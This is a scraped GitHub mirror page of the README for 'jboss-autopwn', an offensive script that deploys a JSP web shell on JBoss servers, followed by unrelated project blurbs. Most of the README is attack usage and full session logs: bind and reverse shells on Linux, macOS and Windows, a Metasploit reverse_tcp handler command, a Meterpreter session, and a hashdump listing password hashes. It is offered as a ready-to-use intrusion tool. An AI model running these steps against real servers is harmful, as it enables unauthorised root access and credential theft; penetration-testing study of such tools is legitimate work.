ply2nite / jboss-autopwn Goto Github PK
View Code? Open in Web Editor NEWThis project forked from spiderlabs/jboss-autopwn
A JBoss script for obtaining remote shell access
License: GNU General Public License v3.0
This project forked from spiderlabs/jboss-autopwn
A JBoss script for obtaining remote shell access
License: GNU General Public License v3.0
JBoss Autopwn Script Christian G. Papathanasiou http://www.spiderlabs.com INTRODUCTION ============ This JBoss script deploys a JSP shell on the target JBoss AS server. Once deployed, the script uses its upload and command execution capability to provide an interactive session. Features include: - Multiplatform support - tested on Windows, Linux and Mac targets - Support for bind and reverse bind shells - Meterpreter shells and VNC support for Windows targets INSTALLATION ============ Dependencies include - Netcat - Curl - Metasploit v3, installed in the current path as "framework3" USAGE ===== Use e.sh for *nix targets that use bind_tcp and reverse_tcp ./e.sh target_ip tcp_port Use e2.sh for Windows targets that can execute Metasploit Windows payloads /e2.sh target_ip tcp_port EXAMPLES ======== Linux bind shell: [root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null [x] Retrieving cookie [x] Now creating BSH script... [x] .war file created successfully in /tmp [x] Now deploying .war file: http://192.168.1.2:8080/browser/browser/browser.jsp [x] Running as user...: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [x] Server uname...: Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux [!] Would you like to upload a reverse or a bind shell? bind [!] On which port would you like the bindshell to listen on? 31337 [x] Uploading bind shell payload.. [x] Verifying if upload was successful... -rwxrwxrwx 1 root root 172 2009-11-22 19:48 /tmp/payload [x] You should have a bind shell on 192.168.1.2:31337.. [x] Dropping you into a shell... Connection to 192.168.1.2 31337 port [tcp/*] succeeded! id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) python -c 'import pty; pty.spawn("/bin/bash")' [root@nitrogen /]# full interactive shell :-) Linux reverse shell: [root@nitrogen jboss]# nc -lv 31337 & [1] 15536 [root@nitrogen jboss]# ./e.sh 192.168.1.2 8080 2>/dev/null [x] Retrieving cookie [x] Now creating BSH script... [x] .war file created successfully in /tmp [x] Now deploying .war file: http://192.168.1.2:8080/browser/browser/browser.jsp [x] Running as user...: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) [x] Server uname...: Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux [!] Would you like to upload a reverse or a bind shell? reverse [!] On which port would you like to accept the reverse shell on? 31337 [x] Uploading reverse shell payload.. [x] Verifying if upload was successful... -rwxrwxrwx 1 root root 157 2009-11-22 19:49 /tmp/payload Connection from 192.168.1.2 port 31337 [tcp/*] accepted [x] You should have a reverse shell on localhost:31337.. [root@nitrogen jboss]# jobs [1]+ Running nc -lv 31337 & [root@nitrogen jboss]# fg 1 nc -lv 31337 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) python -c 'import pty; pty.spawn("/bin/bash")'; [root@nitrogen /]# full interactive tty :-) full interactive tty :-) Against MacOS X (bind shell): [root@nitrogen jboss]# ./e.sh 192.168.1.5 8080 2>/dev/null [x] Retrieving cookie [x] Now creating BSH script... [x] .war file created successfully in /tmp [x] Now deploying .war file: http://192.168.1.5:8080/browser/browser/browser.jsp [x] Running as user...: uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) [x] Server uname...: Darwin helium-2.tiscali.co.uk 9.7.1 Darwin Kernel Version 9.7.1: Thu Apr 23 13:52:18 PDT 2009; root:xnu-1228.14.1~1/RELEASE_I386 i386 [!] Would you like to upload a reverse or a bind shell? bind [!] On which port would you like the bindshell to listen on? 31337 [x] Uploading bind shell payload.. [x] Verifying if upload was successful... -rwxrwxrwx 1 root wheel 172 22 Nov 19:58 /tmp/payload [x] You should have a bind shell on 192.168.1.5:31337.. [x] Dropping you into a shell... Connection to 192.168.1.5 31337 port [tcp/*] succeeded! id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) python -c 'import pty; pty.spawn("/bin/bash")' bash-3.2# id id uid=0(root) gid=0(wheel) groups=0(wheel),1(daemon),2(kmem),8(procview),29(certusers),3(sys),9(procmod),4(tty),5(operator),101(com.apple.sharepoint.group.1),80(admin),20(staff),102(com.apple.sharepoint.group.2) bash-3.2# Likewise for the reverse shell. Windows bind shell: [root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null [x] Retrieving cookie [x] Now creating BSH script... [x] .war file created succesfully on c: [x] Now deploying .war file: [x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp [x] Server name...: Host Name . . . . . . . . . . . . : aquarius [x] Would you like a reverse or bind shell or vnc(bind)? bind [x] On which port would you like your bindshell to listen? 31337 [x] Uploading bindshell payload.. [x] Checking that bind shell was uploaded correctly.. [x] Bind shell uploaded: 22/11/2009 18:35 87,552 payload.exe [x] Now executing bind shell... [x] Executed bindshell! [x] Reverting to metasploit.... [*] Started bind handler [*] Starting the payload handler... [*] Command shell session 1 opened (192.168.1.2:60535 -> 192.168.1.225:31337) Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\chris\Desktop\jboss-4.2.3.GA\server\default\tmp\deploy\tmp8376972724011216327browserwin-exp.war> Windows reverse shell with a Metasploit meterpreter payload: [root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null [x] Retrieving cookie [x] Now creating BSH script... [x] .war file created successfully on c: [x] Now deploying .war file: [x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp [x] Server name...: Host Name . . . . . . . . . . . . : aquarius [x] Would you like a reverse or bind shell or vnc(bind)? reverse [x] On which port would you like to accept your reverse shell? 31337 [x] Uploading reverseshell payload.. [x] Checking that the reverse shell was uploaded correctly.. [x] Reverse shell uploaded: 22/11/2009 18:46 87,552 payload.exe [x] You now have 20 seconds to launch metasploit before I send a reverse shell back.. ctrl-z, bg then type: framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E [x] Now executing reverse shell... [x] Executed reverse shell! [root@nitrogen jboss]# In terminal 2: [root@nitrogen jboss]# framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=31337 E [*] Please wait while we load the module tree... [*] Started reverse handler on port 31337 [*] Starting the payload handler... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.1.2:31337 -> 192.168.1.225:1266) meterpreter > use priv Loading extension priv...success. meterpreter > hashdump Administrator:500:xxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxx::: chris:1005:xxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1004:5cb061f95caf6a9dc7d1bb971b333632:4ac4ee4210529e17665db586df844736::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:293c804ee7b7f93b3919344842b9c98a::: __vmware_user__:1007:aad3b435b51404eeaad3b435b51404ee:a9fa3213d080de5533c7572775a149f5::: meterpreter > Windows VNC shell: [root@nitrogen jboss]# ./e2.sh 192.168.1.225 8080 2>/dev/null [x] Retrieving cookie [x] Now creating BSH script... [x] .war file created successfully on c: [x] Now deploying .war file: [x] Web shell enabled!: http://192.168.1.225:8080/browserwin/browser/Browser.jsp [x] Server name...: Host Name . . . . . . . . . . . . : aquarius [x] Would you like a reverse or bind shell or vnc(bind)? vnc [x] On which port would you like your vnc shell to listen? 21 [x] Uploading vnc shell payload.. [x] Checking that vnc shell was uploaded correctly.. [x] vnc shell uploaded: 22/11/2009 19:14 87,552 payload.exe [x] Now executing vnc shell... [x] Executed vnc shell! [x] Reverting to metasploit.... [*] Started bind handler [*] Starting the payload handler... [*] Sending stage (197120 bytes) [*] Starting local TCP relay on 127.0.0.1:5900... [*] Local TCP relay started. [*] Launched vnciewer in the background. [*] VNC Server session 1 opened (192.168.1.2:52682 -> 192.168.1.225:21) [*] VNC connection closed. [root@nitrogen jboss]# >>VNC window opens here.. :-) COPYRIGHT ========= JBoss Autopwn - A JBoss script for obtaining remote shell access Created by Christian G. Papathanasiou Copyright (C) 2009-2011 Trustwave Holdings, Inc. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.